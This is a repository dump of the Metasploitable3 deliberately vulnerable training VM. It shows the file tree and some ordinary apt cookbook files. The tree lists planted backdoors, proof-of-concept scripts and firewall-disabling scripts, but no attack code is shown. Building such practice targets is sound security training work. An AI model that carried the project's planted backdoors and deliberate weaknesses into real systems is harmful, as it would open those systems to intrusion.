├── .github └── ISSUE_TEMPLATE.md ├── .gitignore ├── COPYING ├── LICENSE ├── README.md ├── Vagrantfile ├── build.ps1 ├── build.sh ├── chef ├── cookbooks │ ├── apt │ │ ├── CHANGELOG.md │ │ ├── CONTRIBUTING.md │ │ ├── README.md │ │ ├── attributes │ │ │ └── default.rb │ │ ├── files │ │ │ ├── 15update-stamp │ │ │ └── apt-proxy-v2.conf │ │ ├── libraries │ │ │ └── helpers.rb │ │ ├── metadata.json │ │ ├── metadata.rb │ │ ├── recipes │ │ │ ├── cacher-client.rb │ │ │ ├── cacher-ng.rb │ │ │ ├── default.rb │ │ │ └── unattended-upgrades.rb │ │ └── templates │ │ │ ├── 01proxy.erb │ │ │ ├── 10dpkg-options.erb │ │ │ ├── 10recommends.erb │ │ │ ├── 20auto-upgrades.erb │ │ │ ├── 50unattended-upgrades.erb │ │ │ ├── acng.conf.erb │ │ │ └── unattended-upgrades.seed.erb │ ├── compat_resource │ │ ├── CHANGELOG.md │ │ ├── CONTRIBUTING.md │ │ ├── MAINTAINERS.md │ │ ├── README.md │ │ ├── files │ │ │ └── lib │ │ │ │ ├── chef_compat │ │ │ │ ├── copied_from_chef.rb │ │ │ │ ├── copied_from_chef │ │ │ │ │ └── chef │ │ │ │ │ │ ├── constants.rb │ │ │ │ │ │ ├── delayed_evaluator.rb │ │ │ │ │ │ ├── dsl │ │ │ │ │ │ ├── core.rb │ │ │ │ │ │ ├── declare_resource.rb │ │ │ │ │ │ ├── platform_introspection.rb │ │ │ │ │ │ ├── recipe.rb │ │ │ │ │ │ └── universal.rb │ │ │ │ │ │ ├── mixin │ │ │ │ │ │ ├── lazy_module_include.rb │ │ │ │ │ │ ├── notifying_block.rb │ │ │ │ │ │ ├── params_validate.rb │ │ │ │ │ │ ├── powershell_out.rb │ │ │ │ │ │ └── properties.rb │ │ │ │ │ │ ├── property.rb │ │ │ │ │ │ ├── provider.rb │ │ │ │ │ │ ├── provider │ │ │ │ │ │ ├── apt_repository.rb │ │ │ │ │ │ ├── apt_update.rb │ │ │ │ │ │ ├── noop.rb │ │ │ │ │ │ ├── support │ │ │ │ │ │ │ └── yum_repo.erb │ │ │ │ │ │ ├── systemd_unit.rb │ │ │ │ │ │ └── yum_repository.rb │ │ │ │ │ │ ├── resource.rb │ │ │ │ │ │ ├── resource │ │ │ │ │ │ ├── action_class.rb │ │ │ │ │ │ ├── apt_repository.rb │ │ │ │ │ │ ├── apt_update.rb │ │ │ │ │ │ ├── systemd_unit.rb │ │ │ │ │ │ └── yum_repository.rb │ │ │ │ │ │ └── resource_builder.rb │ │ │ │ ├── mixin │ │ │ │ │ └── properties.rb │ │ │ │ ├── monkeypatches.rb │ │ │ │ ├── monkeypatches │ │ │ │ │ ├── chef.rb │ │ │ │ │ └── chef │ │ │ │ │ │ ├── exceptions.rb │ │ │ │ │ │ ├── log.rb │ │ │ │ │ │ ├── mixin │ │ │ │ │ │ └── params_validate.rb │ │ │ │ │ │ ├── node.rb │ │ │ │ │ │ ├── property.rb │ │ │ │ │ │ ├── provider.rb │ │ │ │ │ │ ├── recipe.rb │ │ │ │ │ │ ├── recipe_hook.rb │ │ │ │ │ │ ├── resource.rb │ │ │ │ │ │ ├── resource │ │ │ │ │ │ └── lwrp_base.rb │ │ │ │ │ │ ├── resource_builder.rb │ │ │ │ │ │ ├── resource_collection.rb │ │ │ │ │ │ ├── resource_collection │ │ │ │ │ │ ├── resource_list.rb │ │ │ │ │ │ └── resource_set.rb │ │ │ │ │ │ ├── run_context.rb │ │ │ │ │ │ └── runner.rb │ │ │ │ ├── property.rb │ │ │ │ ├── recipe.rb │ │ │ │ ├── resource.rb │ │ │ │ └── resource │ │ │ │ │ └── lwrp_base.rb │ │ │ │ ├── chef_upstream_version.rb │ │ │ │ └── compat_resource.rb │ │ ├── libraries │ │ │ └── autoload.rb │ │ └── metadata.json │ ├── docker │ │ ├── CHANGELOG.md │ │ ├── CONTRIBUTING.md │ │ ├── README.md │ │ ├── libraries │ │ │ ├── docker_base.rb │ │ │ ├── docker_container.rb │ │ │ ├── docker_exec.rb │ │ │ ├── docker_image.rb │ │ │ ├── docker_image_prune.rb │ │ │ ├── docker_installation_package.rb │ │ │ ├── docker_installation_script.rb │ │ │ ├── docker_installation_tarball.rb │ │ │ ├── docker_network.rb │ │ │ ├── docker_plugin.rb │ │ │ ├── docker_registry.rb │ │ │ ├── docker_service.rb │ │ │ ├── docker_service_base.rb │ │ │ ├── docker_service_manager_execute.rb │ │ │ ├── docker_service_manager_systemd.rb │ │ │ ├── docker_service_manager_sysvinit_debian.rb │ │ │ ├── docker_service_manager_sysvinit_rhel.rb │ │ │ ├── docker_service_manager_upstart.rb │ │ │ ├── docker_tag.rb │ │ │ ├── docker_volume.rb │ │ │ └── helpers_service.rb │ │ ├── metadata.json │ │ ├── metadata.rb │ │ └── templates │ │ │ └── default │ │ │ ├── default │ │ │ ├── docker-wait-ready.erb │ │ │ └── docker.erb │ │ │ ├── sysconfig │ │ │ └── docker.erb │ │ │ ├── systemd │ │ │ ├── docker.service-override.erb │ │ │ ├── docker.service.erb │ │ │ ├── docker.socket-override.erb │ │ │ ├── docker.socket.erb │ │ │ └── tmpfiles.d.conf.erb │ │ │ ├── sysvinit │ │ │ ├── docker-debian.erb │ │ │ └── docker-rhel.erb │ │ │ └── upstart │ │ │ └── docker.conf.erb │ ├── iptables │ │ ├── CHANGELOG.md │ │ ├── README.md │ │ ├── attributes │ │ │ └── default.rb │ │ ├── metadata.json │ │ ├── recipes │ │ │ ├── _package.rb │ │ │ ├── default.rb │ │ │ └── disabled.rb │ │ ├── resources │ │ │ ├── rule.rb │ │ │ └── rule6.rb │ │ └── templates │ │ │ └── default │ │ │ ├── iptables-config.erb │ │ │ ├── iptables_load.erb │ │ │ └── rebuild-iptables.erb │ ├── metasploitable │ │ ├── .delivery │ │ │ ├── build_cookbook │ │ │ │ ├── .kitchen.yml │ │ │ │ ├── Berksfile │ │ │ │ ├── LICENSE │ │ │ │ ├── README.md │ │ │ │ ├── chefignore │ │ │ │ ├── data_bags │ │ │ │ │ └── keys │ │ │ │ │ │ └── delivery_builder_keys.json │ │ │ │ ├── metadata.rb │ │ │ │ ├── recipes │ │ │ │ │ ├── default.rb │ │ │ │ │ ├── deploy.rb │ │ │ │ │ ├── functional.rb │ │ │ │ │ ├── lint.rb │ │ │ │ │ ├── provision.rb │ │ │ │ │ ├── publish.rb │ │ │ │ │ ├── quality.rb │ │ │ │ │ ├── security.rb │ │ │ │ │ ├── smoke.rb │ │ │ │ │ ├── syntax.rb │ │ │ │ │ └── unit.rb │ │ │ │ ├── secrets │ │ │ │ │ └── fakey-mcfakerton │ │ │ │ └── test │ │ │ │ │ └── fixtures │ │ │ │ │ └── cookbooks │ │ │ │ │ └── test │ │ │ │ │ ├── metadata.rb │ │ │ │ │ └── recipes │ │ │ │ │ └── default.rb │ │ │ ├── config.json │ │ │ └── project.toml │ │ ├── .gitignore │ │ ├── .kitchen.yml │ │ ├── Berksfile │ │ ├── README.md │ │ ├── attributes │ │ │ ├── apache_continuum.rb │ │ │ ├── default.rb │ │ │ ├── drupal.rb │ │ │ ├── flags.rb │ │ │ ├── mysql.rb │ │ │ ├── php545.rb │ │ │ ├── proftpd.rb │ │ │ ├── unrealircd.rb │ │ │ └── users.rb │ │ ├── chefignore │ │ ├── files │ │ │ ├── apache │ │ │ │ ├── cgi-bin.conf │ │ │ │ ├── dav.conf │ │ │ │ ├── hello_world.sh │ │ │ │ ├── php5.conf │ │ │ │ └── php5.load │ │ │ ├── apache_continuum │ │ │ │ └── data.tar.gz │ │ │ ├── chatbot │ │ │ │ └── chatbot.zip │ │ │ ├── cups │ │ │ │ └── cupsd.conf │ │ │ ├── drupal │ │ │ │ ├── default_site.tar.gz │ │ │ │ └── drupal.sql │ │ │ ├── flags │ │ │ │ ├── 10_of_clubs.wav │ │ │ │ ├── 2_of_spades.pcapng │ │ │ │ ├── 5_of_hearts.png │ │ │ │ ├── 7_of_diamonds.zip │ │ │ │ ├── 8_of_hearts.zip │ │ │ │ ├── Dockerfile │ │ │ │ ├── ace_of_clubs_b64.txt │ │ │ │ ├── five_of_diamonds │ │ │ │ ├── five_of_diamonds_srv │ │ │ │ ├── flag_images │ │ │ │ │ ├── 10 of spades.png │ │ │ │ │ ├── 3 of hearts.png │ │ │ │ │ └── 8 of clubs.png │ │ │ │ ├── joker.png │ │ │ │ ├── king_of_spades.png │ │ │ │ ├── my_recordings_do_not_open.iso │ │ │ │ └── super_secret_db.sql │ │ │ ├── knockd │ │ │ │ └── knockd │ │ │ ├── payroll_app │ │ │ │ ├── payroll_app.php │ │ │ │ └── poc.rb │ │ │ ├── phpmyadmin │ │ │ │ └── config.inc.php │ │ │ ├── proftpd │ │ │ │ ├── hosts_renewer.conf │ │ │ │ ├── hosts_renewer.rb │ │ │ │ ├── proftpd │ │ │ │ ├── proftpd_ip_renewer.conf │ │ │ │ └── proftpd_ip_renewer.rb │ │ │ ├── readme_app │ │ │ │ └── readme_app.conf │ │ │ ├── samba │ │ │ │ ├── passdb.tdb │ │ │ │ └── smb.conf │ │ │ ├── sinatra │ │ │ │ ├── Gemfile │ │ │ │ ├── aws │ │ │ │ │ └── loader │ │ │ │ ├── sinatra.conf │ │ │ │ └── virtualbox │ │ │ │ │ └── loader │ │ │ ├── sshd │ │ │ │ └── sshd_config │ │ │ └── unrealircd │ │ │ │ ├── ircd.motd │ │ │ │ ├── unrealircd │ │ │ │ └── unrealircd.conf │ │ ├── metadata.rb │ │ ├── recipes │ │ │ ├── apache.rb │ │ │ ├── apache_continuum.rb │ │ │ ├── chatbot.rb │ │ │ ├── clear_cache.rb │ │ │ ├── cups.rb │ │ │ ├── default.rb │ │ │ ├── docker.rb │ │ │ ├── drupal.rb │ │ │ ├── flags.rb │ │ │ ├── ifnames.rb │ │ │ ├── iptables.rb │ │ │ ├── knockd.rb │ │ │ ├── mysql.rb │ │ │ ├── nodejs.rb │ │ │ ├── payroll_app.rb │ │ │ ├── php_545.rb │ │ │ ├── phpmyadmin.rb │ │ │ ├── proftpd.rb │ │ │ ├── readme_app.rb │ │ │ ├── ruby23.rb │ │ │ ├── samba.rb │ │ │ ├── sinatra.rb │ │ │ ├── sshd.rb │ │ │ ├── unrealircd.rb │ │ │ ├── users.rb │ │ │ └── vm_tools.rb │ │ ├── spec │ │ │ ├── spec_helper.rb │ │ │ └── unit │ │ │ │ └── recipes │ │ │ │ ├── default_spec.rb │ │ │ │ └── mysql_spec.rb │ │ ├── templates │ │ │ ├── knockd │ │ │ │ └── knockd.conf.erb │ │ │ ├── payroll_app │ │ │ │ └── payroll.sql.erb │ │ │ └── readme_app │ │ │ │ └── start.sh.erb │ │ └── test │ │ │ ├── helpers │ │ │ └── chat_test.rb │ │ │ ├── linux │ │ │ ├── apache.rb │ │ │ ├── chatbot.rb │ │ │ ├── cups.rb │ │ │ ├── docker.rb │ │ │ ├── drupal.rb │ │ │ ├── flags.rb │ │ │ ├── knockd.rb │ │ │ ├── mysql.rb │ │ │ ├── nodejs.rb │ │ │ ├── php_545.rb │ │ │ ├── phpmyadmin.rb │ │ │ ├── proftpd.rb │ │ │ ├── readme_app.rb │ │ │ ├── ruby23.rb │ │ │ ├── samba.rb │ │ │ ├── sinatra.rb │ │ │ └── unrealircd.rb │ │ │ ├── smoke │ │ │ └── default │ │ │ │ ├── default_test.rb │ │ │ │ └── mysql.rb │ │ │ └── windows │ │ │ ├── 7zip.rb │ │ │ ├── apache_struts.rb │ │ │ ├── axis2.rb │ │ │ ├── backdoors.rb │ │ │ ├── boxstarter.rb │ │ │ ├── choco.rb │ │ │ ├── create_users.rb │ │ │ ├── devkit.rb │ │ │ ├── disable_auto_logon.rb │ │ │ ├── disable_firewall.rb │ │ │ ├── elasticsearch.rb │ │ │ ├── enable_rdp.rb │ │ │ ├── firewall.rb │ │ │ ├── flag_check.rb │ │ │ ├── ftp_site.rb │ │ │ ├── glassfish.rb │ │ │ ├── iis.rb │ │ │ ├── java.rb │ │ │ ├── jenkins.rb │ │ │ ├── jmx.rb │ │ │ ├── manageengine.rb │ │ │ ├── mysql.rb │ │ │ ├── openjdk6.rb │ │ │ ├── password_settings.rb │ │ │ ├── psexec.rb │ │ │ ├── rails_service.rb │ │ │ ├── ruby.rb │ │ │ ├── snmp.rb │ │ │ ├── tomcat.rb │ │ │ ├── wamp.rb │ │ │ ├── webdav.rb │ │ │ ├── winrm.rb │ │ │ └── wordpress.rb │ └── mysql │ │ ├── .foodcritic │ │ ├── CHANGELOG.md │ │ ├── CONTRIBUTING.md │ │ ├── README.md │ │ ├── libraries │ │ ├── helpers.rb │ │ ├── matchers.rb │ │ ├── mysql_base.rb │ │ ├── mysql_client_installation_package.rb │ │ ├── mysql_config.rb │ │ ├── mysql_server_installation_package.rb │ │ ├── mysql_service.rb │ │ ├── mysql_service_base.rb │ │ ├── mysql_service_manager_systemd.rb │ │ ├── mysql_service_manager_sysvinit.rb │ │ └── mysql_service_manager_upstart.rb │ │ ├── metadata.json │ │ └── templates │ │ └── default │ │ ├── apparmor │ │ ├── usr.sbin.mysqld-instance.erb │ │ ├── usr.sbin.mysqld-local.erb │ │ └── usr.sbin.mysqld.erb │ │ ├── my.cnf.erb │ │ ├── smf │ │ └── svc.method.mysqld.erb │ │ ├── systemd │ │ ├── mysqld-wait-ready.erb │ │ └── mysqld.service.erb │ │ ├── sysvinit │ │ └── mysqld.erb │ │ ├── tmpfiles.d.conf.erb │ │ └── upstart │ │ ├── mysqld-wait-ready.erb │ │ └── mysqld.erb └── dev │ └── ub1404 │ └── Vagrantfile ├── cortex.yaml ├── iso └── README.md ├── packer ├── answer_files │ └── 2008_r2 │ │ └── Autounattend.xml ├── http │ └── preseed.cfg ├── scripts │ └── virtio-win-drivers.sh └── templates │ ├── aws │ └── ubuntu_1404_ctf_2017.json │ ├── pro │ ├── ubuntu_1404_pro.json │ └── windows_2008_r2_pro.json │ ├── ubuntu_1404.json │ ├── vagrantfile-windows_2008_r2.template │ └── windows_2008_r2.json ├── resources ├── apache_struts │ ├── server.xml │ ├── struts.xml │ ├── struts2-rest-showcase.war │ └── tomcat-users.xml ├── backdoors │ ├── caidao.asp │ ├── meterpreter.php │ └── mma.php ├── certs │ ├── COMODORSAAddTrustCA.crt │ ├── COMODORSAExtendedValidationSecureServerCA.crt │ ├── addtrust_external_ca.cer │ ├── baltimore_ca.cer │ ├── comodorsacertificationauthority.crt │ ├── comodorsadomainvalidationsecureserverca.crt │ ├── digicert.cer │ ├── equifax.cer │ ├── gdig2.crt │ ├── globalsign.cer │ ├── gte_cybertrust.cer │ ├── microsoft_root_2011.cer │ ├── oracle-cert.cer │ ├── thawte_primary_root.cer │ └── utn-userfirst.cer ├── download-windows-files.ps1 ├── download-windows-files.sh ├── flags │ ├── ace_of_hearts.jpg │ ├── four_of_clubs.wav │ ├── hahaha.jpg │ ├── jack_of_clubs.png │ ├── jack_of_diamonds.b64 │ ├── jack_of_hearts.docx │ ├── joker.html │ ├── kingofclubs.exe │ ├── linux_flags │ │ ├── 10_of_clubs │ │ │ ├── 10 of clubs.png │ │ │ ├── 10_of_clubs.wav │ │ │ ├── extracted_flag.png │ │ │ ├── get_flag.rb │ │ │ └── make_wave.rb │ │ ├── 5_of_diamonds │ │ │ ├── five_of_diamonds │ │ │ ├── make_5_of_diamonds_http_server.rb │ │ │ └── source.png │ │ ├── 5_of_hearts │ │ │ ├── 5_of_hearts.png │ │ │ ├── extract_metadata.rb │ │ │ ├── fake.png │ │ │ ├── inject_metadata.rb │ │ │ └── source.png │ │ ├── 6_of_clubs │ │ │ ├── base64_string.txt │ │ │ ├── check_sinatra_vuln.rb │ │ │ ├── get_flag.rb │ │ │ ├── poc.rb │ │ │ ├── server │ │ │ ├── server.rb │ │ │ ├── source.png │ │ │ └── start.cr │ │ ├── 7_of_diamonds │ │ │ ├── 7_of_diamonds.zip │ │ │ ├── create_qr_hint.rb │ │ │ ├── extract_hint_from_qr.rb │ │ │ ├── hint.png │ │ │ ├── source.png │ │ │ └── zip_png.rb │ │ ├── 8_of_hearts │ │ │ ├── 8_of_hearts.zip │ │ │ ├── source.png │ │ │ └── zip_png.rb │ │ ├── ace_of_clubs │ │ │ ├── base64_string.txt │ │ │ ├── chatbot.zip │ │ │ └── source.png │ │ ├── joker_flag │ │ │ ├── convert.rb │ │ │ ├── joker.png │ │ │ ├── md5.txt │ │ │ └── source.png │ │ └── king_of_spades │ │ │ ├── fake.png │ │ │ ├── flag.png │ │ │ ├── flag_base64.txt │ │ │ ├── king_of_spades.png │ │ │ └── make_king_of_spades.rb │ ├── queen_of_hearts.sql │ ├── seven_of_hearts.html │ ├── seven_of_spades.pdf │ ├── six_of_diamonds.zip │ ├── ten_of_diamonds.png │ └── three_of_spades.png ├── glassfish │ ├── admin-keyfile │ └── domain.xml ├── iis │ └── applicationHost.config ├── jenkins │ ├── jenkins.exe │ └── jenkins.war ├── jmx │ ├── Hello.class │ ├── HelloMBean.class │ ├── SimpleAgent.class │ ├── jmx.exe │ └── start_jmx.bat ├── manageengine │ └── setup.iss ├── mysql │ ├── my.ini │ └── update_mysql_permissions.sql ├── rails_server │ ├── Gemfile │ ├── devkit │ │ └── dk.rb │ ├── gemrc │ ├── sqlite3-1.3.11-x64-mingw32.gemspec │ └── start_rails_server.bat ├── security_settings │ └── secconfig.cfg ├── wamp │ ├── httpd.conf │ ├── phpMyAdmin-3.5.2.2-english.zip │ ├── phpmyadmin.conf │ └── wampserver2.2d-x64.exe ├── webdav │ └── httpd-dav.conf ├── windows_pre_downloads │ └── .gitkeep └── wordpress │ ├── update_ip.ps1 │ ├── wordpress.sql │ └── wordpress.zip ├── scripts ├── chocolatey_installs │ ├── 7zip.bat │ ├── boxstarter.bat │ ├── chocolatey-compatibility.bat │ ├── java.bat │ ├── ruby.bat │ ├── tomcat.bat │ └── vcredist2008.bat ├── configs │ ├── apply_password_settings.bat │ ├── configure_firewall.bat │ ├── create_users.bat │ ├── disable-auto-logon.bat │ ├── disable_firewall.bat │ ├── enable-rdp.bat │ ├── enable_firewall.bat │ ├── microsoft-updates.bat │ ├── packer_cleanup.bat │ ├── update_root_certs.bat │ ├── vagrant-ssh.ps1 │ └── win-updates.ps1 └── installs │ ├── chocolatey.ps1 │ ├── install_backdoors.bat │ ├── install_devkit.bat │ ├── install_dotnet45.ps1 │ ├── install_elasticsearch.bat │ ├── install_flags.bat │ ├── install_manageengine.bat │ ├── install_openjdk6.bat │ ├── install_rails_server.bat │ ├── install_rails_service.bat │ ├── install_share_autorun.bat │ ├── install_wamp.bat │ ├── install_wmf.ps1 │ ├── install_wordpress.bat │ ├── openssh.ps1 │ ├── setup_apache_struts.bat │ ├── setup_axis2.bat │ ├── setup_ftp_site.bat │ ├── setup_glassfish.bat │ ├── setup_iis.bat │ ├── setup_jenkins.bat │ ├── setup_jmx.bat │ ├── setup_linux_share.bat │ ├── setup_mysql.bat │ ├── setup_rails_server.bat │ ├── setup_snmp.bat │ ├── setup_webdav.bat │ ├── start_glassfish_service.bat │ ├── start_wamp.bat │ └── vm-guest-tools.bat └── versions └── pro └── Vagrantfile /.github/ISSUE_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | ## Issue Description 2 | **Please check the [General Issues](https://github.com/rapid7/metasploitable3/wiki/General-Issues) section in the wiki before you submit the issue.** 3 | If you didn't find your issue mentioned, please give a thorough description of the issue you're seeing. 4 | Also, please be sure to include any troubleshooting steps that you've already attempted. 5 | 6 | ## Host System 7 | * OS: 8 | * Packer Version: 9 | * Vagrant Version: 10 | * VirtualBox Version: 11 | 12 | ## Command Output 13 | Copy the relevant command output here. 14 | If it's long, either post to a gist and add the link here, or isolate the error lines. 15 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .vagrant/ 2 | packer_cache/ 3 | packer/builds/ 4 | resources/drivers/ 5 | resources/windows_pre_downloads/ 6 | *.vfd 7 | *.exe 8 | *.msi 9 | *.msu 10 | *.DS_Store 11 | *.box 12 | *.iso 13 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | Please refer to 2 | https://github.com/chef-cookbooks/community_cookbook_documentation/blob/master/CONTRIBUTING.MD 3 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/files/15update-stamp: -------------------------------------------------------------------------------- 1 | APT::Update::Post-Invoke-Success {"touch /var/lib/apt/periodic/update-success-stamp 2>/dev/null || true";}; 2 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/files/apt-proxy-v2.conf: -------------------------------------------------------------------------------- 1 | [DEFAULT] 2 | ;; All times are in seconds, but you can add a suffix 3 | ;; for minutes(m), hours(h) or days(d) 4 | 5 | ;; commented out address so apt-proxy will listen on all IPs 6 | ;; address = 127.0.0.1 7 | port = 9999 8 | cache_dir = /var/cache/apt-proxy 9 | 10 | ;; Control files (Packages/Sources/Contents) refresh rate 11 | min_refresh_delay = 1s 12 | complete_clientless_downloads = 1 13 | 14 | ;; Debugging settings. 15 | debug = all:4 db:0 16 | 17 | time = 30 18 | passive_ftp = on 19 | 20 | ;;-------------------------------------------------------------- 21 | ;; Cache housekeeping 22 | 23 | cleanup_freq = 1d 24 | max_age = 120d 25 | max_versions = 3 26 | 27 | ;;--------------------------------------------------------------- 28 | ;; Backend servers 29 | ;; 30 | ;; Place each server in its own [section] 31 | 32 | [ubuntu] 33 | ; Ubuntu archive 34 | backends = 35 | http://us.archive.ubuntu.com/ubuntu 36 | 37 | [ubuntu-security] 38 | ; Ubuntu security updates 39 | backends = http://security.ubuntu.com/ubuntu 40 | 41 | [debian] 42 | ;; Backend servers, in order of preference 43 | backends = 44 | http://debian.osuosl.org/debian/ 45 | 46 | [security] 47 | ;; Debian security archive 48 | backends = 49 | http://security.debian.org/debian-security 50 | http://ftp2.de.debian.org/debian-security 51 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/libraries/helpers.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: apt 3 | # Library:: helpers 4 | # 5 | # Copyright:: 2013-2017, Chef Software, Inc. 6 | # 7 | # Licensed under the Apache License, Version 2.0 (the "License"); 8 | # you may not use this file except in compliance with the License. 9 | # You may obtain a copy of the License at 10 | # 11 | # http://www.apache.org/licenses/LICENSE-2.0 12 | # 13 | # Unless required by applicable law or agreed to in writing, software 14 | # distributed under the License is distributed on an "AS IS" BASIS, 15 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 16 | # See the License for the specific language governing permissions and 17 | # limitations under the License. 18 | # 19 | 20 | module Apt 21 | # Helpers for apt 22 | module Helpers 23 | # Determines if apt is installed on a system. 24 | # 25 | # @return [Boolean] 26 | def apt_installed? 27 | !which('apt-get').nil? 28 | end 29 | 30 | # Finds a command in $PATH 31 | # 32 | # @return [String, nil] 33 | def which(cmd) 34 | ENV['PATH'] = '' if ENV['PATH'].nil? 35 | paths = (ENV['PATH'].split(::File::PATH_SEPARATOR) + %w(/bin /usr/bin /sbin /usr/sbin)) 36 | 37 | paths.each do |path| 38 | possible = File.join(path, cmd) 39 | return possible if File.executable?(possible) 40 | end 41 | 42 | nil 43 | end 44 | end 45 | end 46 | 47 | Chef::Recipe.send(:include, ::Apt::Helpers) 48 | Chef::Resource.send(:include, ::Apt::Helpers) 49 | Chef::Provider.send(:include, ::Apt::Helpers) 50 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/metadata.rb: -------------------------------------------------------------------------------- 1 | name 'apt' 2 | maintainer 'Chef Software, Inc.' 3 | maintainer_email 'cookbooks@chef.io' 4 | license 'Apache-2.0' 5 | description 'Configures apt and apt caching.' 6 | long_description IO.read(File.join(File.dirname(__FILE__), 'README.md')) 7 | version '7.2.0' 8 | 9 | %w(ubuntu debian).each do |os| 10 | supports os 11 | end 12 | 13 | source_url 'https://github.com/chef-cookbooks/apt' 14 | issues_url 'https://github.com/chef-cookbooks/apt/issues' 15 | chef_version '>= 13.3' 16 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/recipes/cacher-ng.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: apt 3 | # Recipe:: cacher-ng 4 | # 5 | # Copyright:: 2008-2017, Chef Software, Inc. 6 | # 7 | # Licensed under the Apache License, Version 2.0 (the 'License'); 8 | # you may not use this file except in compliance with the License. 9 | # You may obtain a copy of the License at 10 | # 11 | # http://www.apache.org/licenses/LICENSE-2.0 12 | # 13 | # Unless required by applicable law or agreed to in writing, software 14 | # distributed under the License is distributed on an 'AS IS' BASIS, 15 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 16 | # See the License for the specific language governing permissions and 17 | # limitations under the License. 18 | # 19 | 20 | package 'apt-cacher-ng' 21 | 22 | directory node['apt']['cacher_dir'] do 23 | owner 'apt-cacher-ng' 24 | group 'apt-cacher-ng' 25 | mode '0755' 26 | end 27 | 28 | template '/etc/apt-cacher-ng/acng.conf' do 29 | source 'acng.conf.erb' 30 | owner 'root' 31 | group 'root' 32 | mode '0644' 33 | notifies :restart, 'service[apt-cacher-ng]', :immediately 34 | end 35 | 36 | service 'apt-cacher-ng' do 37 | supports restart: true, status: false 38 | action [:enable, :start] 39 | end 40 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/recipes/unattended-upgrades.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: apt 3 | # Recipe:: unattended-upgrades 4 | # 5 | # Copyright:: 2014-2017, Chef Software, Inc. 6 | # 7 | # Licensed under the Apache License, Version 2.0 (the 'License'); 8 | # you may not use this file except in compliance with the License. 9 | # You may obtain a copy of the License at 10 | # 11 | # http://www.apache.org/licenses/LICENSE-2.0 12 | # 13 | # Unless required by applicable law or agreed to in writing, software 14 | # distributed under the License is distributed on an 'AS IS' BASIS, 15 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 16 | # See the License for the specific language governing permissions and 17 | # limitations under the License. 18 | # 19 | 20 | # On systems where apt is not installed, the resources in this recipe are not 21 | # executed. However, they _must_ still be present in the resource collection 22 | # or other cookbooks which notify these resources will fail on non-apt-enabled 23 | # systems. 24 | # 25 | 26 | package 'unattended-upgrades' do # ~FC009 27 | response_file 'unattended-upgrades.seed.erb' 28 | action :install 29 | end 30 | 31 | package 'bsd-mailx' do 32 | not_if { node['apt']['unattended_upgrades']['mail'].nil? } 33 | end 34 | 35 | template '/etc/apt/apt.conf.d/20auto-upgrades' do 36 | owner 'root' 37 | group 'root' 38 | mode '0644' 39 | source '20auto-upgrades.erb' 40 | end 41 | 42 | template '/etc/apt/apt.conf.d/50unattended-upgrades' do 43 | owner 'root' 44 | group 'root' 45 | mode '0644' 46 | source '50unattended-upgrades.erb' 47 | end 48 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/templates/01proxy.erb: -------------------------------------------------------------------------------- 1 | Acquire::http::Proxy "http://<%= @server['host'] %>:<%= @server['port'] %>"; 2 | <% if @server['proxy_ssl'] %> 3 | Acquire::https::Proxy "http://<%= @server['host'] %>:<%= @server['port'] %>"; 4 | <% else %> 5 | Acquire::https::Proxy "DIRECT"; 6 | <% end %> 7 | <% unless @server['cache_bypass'].nil? %> 8 | <% @server['cache_bypass'].each do |bypass, type| %> 9 | Acquire::<%= type %>::Proxy::<%= bypass %> "DIRECT"; 10 | <% end %> 11 | <% end %> 12 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/templates/10dpkg-options.erb: -------------------------------------------------------------------------------- 1 | # Managed by Chef 2 | DPkg::Options { 3 | <%= node['apt']['confd']['force_confask'] ? '"--force-confask";' : '' -%> 4 | <%= node['apt']['confd']['force_confdef'] ? '"--force-confdef";' : '' -%> 5 | <%= node['apt']['confd']['force_confmiss'] ? '"--force-confmiss";' : '' -%> 6 | <%= node['apt']['confd']['force_confnew'] ? '"--force-confnew";' : '' -%> 7 | <%= node['apt']['confd']['force_confold'] ? '"--force-confold";' : '' -%> 8 | } 9 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/templates/10recommends.erb: -------------------------------------------------------------------------------- 1 | # Managed by Chef 2 | APT::Install-Recommends "<%= node['apt']['confd']['install_recommends'] ? 1 : 0 %>"; 3 | APT::Install-Suggests "<%= node['apt']['confd']['install_suggests'] ? 1 : 0 %>"; 4 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/templates/20auto-upgrades.erb: -------------------------------------------------------------------------------- 1 | APT::Periodic::Update-Package-Lists "<%= node['apt']['unattended_upgrades']['update_package_lists'] ? 1 : 0 %>"; 2 | APT::Periodic::Unattended-Upgrade "<%= node['apt']['unattended_upgrades']['enable'] ? 1 : 0 %>"; 3 | <% if node['apt']['unattended_upgrades']['random_sleep'] -%> 4 | APT::Periodic::RandomSleep "<%= node['apt']['unattended_upgrades']['random_sleep'] %>"; 5 | <% end -%> 6 | -------------------------------------------------------------------------------- /chef/cookbooks/apt/templates/unattended-upgrades.seed.erb: -------------------------------------------------------------------------------- 1 | unattended-upgrades unattended-upgrades/enable_auto_updates boolean <%= node['apt']['unattended_upgrades']['enable'] ? 'true' : 'false' %> 2 | -------------------------------------------------------------------------------- /chef/cookbooks/compat_resource/CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # compat_resource Cookbook CHANGELOG 2 | 3 | This file is used to list changes made in each version of the compat_resource cookbook. 4 | 5 | ## 12.16.2 (2016-11-09) 6 | 7 | - Sync chef-client changes from Chef 12.16.42 8 | 9 | ## 12.16.1 (2016-10-20) 10 | 11 | - add delayed_action helper 12 | 13 | ## 12.16.0 (2016-10-19) 14 | 15 | - Sync chef-client changes from Chef 12.16.14 16 | 17 | ## 12.14.7 (2016-09-26) 